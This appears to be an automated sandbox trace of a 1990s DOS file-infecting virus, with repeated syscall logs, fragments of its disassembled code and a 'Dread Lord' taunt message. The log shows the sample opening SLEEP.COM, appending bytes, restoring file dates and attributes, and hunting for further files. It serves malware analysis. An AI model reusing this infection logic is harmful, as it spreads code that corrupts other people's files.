0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.440876165Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.451307442Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.452886688Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.458900641Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.472373863Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.475419934Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.484069856Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.491152832Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.493424654Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.505535017Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.513491993Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.515745812Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.517041329Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.520144771Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.526909444Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.52818833Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.535189835Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.546597385Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.549801064Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.556301271Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.568858129Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.5705012Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.57823557Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.58328052Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.585535738Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.587043859Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.590431166Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.597843347Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.600110619Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.607469667Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.616620772Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.620072774Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.625769978Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.630275627Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.631740076Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.639418017Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.652900423Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.660215157Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.662227464Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.665049295Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.675128556Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.677274472Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.685777832Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.696864276Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.700257204Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.708394542Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.715256006Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.717277663Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.722317473Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.727507339Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.730624465Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.732904104Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.735812765Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.751661836Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.754020683Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.7559018Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.758964109Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.761665091Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.768891878Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.776217731Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.778729145Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.78951699Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.796763676Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.800110823Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.801863029Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.804852941Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.815162766Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.816733452Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.824643306Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.83553221Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.83866143Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.845778279Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.852797795Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.855074728Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.866278076Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.87359005Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.879182305Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.880908283Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.883722938Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.892704186Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.894505883Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.903707754Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.915351362Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.918421822Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.92563152Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.934165033Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.936334473Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.939149194Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:09.943910508Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:09.947055024Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:09.957931945Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.959590331Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:09.962094808Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:09.963235404Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:09.595877438Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:09.603490576Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.60497552Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.605987542Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:09.609013107Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:09.616297006Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:09.622970368Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:09.630607142Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:09.6385291Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:09.641206525Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.66080922Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.66979893Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.67685288Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.678490532Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.681123656Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.686950711Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.688005965Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.693394968Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.700008954Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.701844129Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.706405107Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.713477711Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.715441034Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.726781881Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.731641881Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.734514177Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.735888606Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.739021616Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.744680294Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.745757546Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.756165184Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.764982142Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.766802948Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.77140747Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.775595612Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.776951123Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.785447949Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.794042429Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.798894503Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.804738517Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.806886297Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.81288815Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.815266038Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.82157775Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.829172235Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.831037618Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.838190488Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.84611996Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.848955811Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.857166298Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.870108983Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.877461421Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.879653114Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.882449605Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.891517381Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.893851844Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.902665644Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.913802446Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.917301287Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.923124099Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.929164175Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.931084739Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.935743755Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.940881215Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.944169395Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.947155594Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.949657225Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.967976731Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.970454762Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.972507641Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.97729587Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.980750319Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.988610328Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.997959476Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.001246805Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.012782117Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.020584079Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.024964957Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.027013754Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.030225061Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.040600725Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.043486009Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.052175675Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.059045625Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.062599223Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.072518351Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.079138278Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.082199545Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.089060325Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.093418369Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.095843792Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.097190281Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.098832092Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.104604163Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.10582261Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.111839804Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.126992169Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.129953019Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.137170631Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.148209846Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.150758273Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.153357152Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.158159664Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.161109912Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.171521593Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.173084697Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.17505352Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.176185361Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.048380019Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.049702106Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.051348762Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.052923187Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.056515214Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.062333669Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.066443351Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.073949954Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.082053688Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.084000943Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.102244622Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.115709009Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.120095636Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.121103443Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.123191073Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.133835743Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.135829972Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.148159018Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.162871407Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.166002875Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.174690722Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.182443092Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.185059359Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.197026833Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.205415011Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.209177719Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.211209684Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.215215313Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.224845407Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.229952685Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.254239893Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.265863877Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.26917821Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.277974243Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.289461562Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.291658053Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.304334589Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.31311006Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.316313945Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.317946119Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.321482002Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.331303518Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.333435024Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.343171713Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.365989283Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.369941612Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.378059628Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.386026871Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.388578847Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.4017543Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.410795452Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.414424812Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.417235078Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.420850559Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.431687439Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.433827483Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.444669587Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.456798859Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.461385007Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.470282599Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.477588704Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.480092917Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.486282603Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.491783927Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.494983853Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.497747096Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.500815698Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.524642112Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.527430518Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.529678183Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.534910122Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.538086053Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.545725434Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.553920863Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.556414962Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.569407882Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.577344179Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.580932921Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.584125618Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.58739354Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.593728757Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.596990702Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.605565022Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.624894403Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.628953486Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.637365693Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.644839898Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.647557881Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.659353436Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.673842141Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.682122748Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.684583895Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.68803922Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.69862796Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.701129693Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.710107522Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.72900369Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.733141265Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.74111118Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.748904231Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.752254617Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.755741585Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.761926832Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.765496648Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.776727033Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.77842279Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.780716219Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.78340398Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.048228291Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.049840546Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.055485484Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
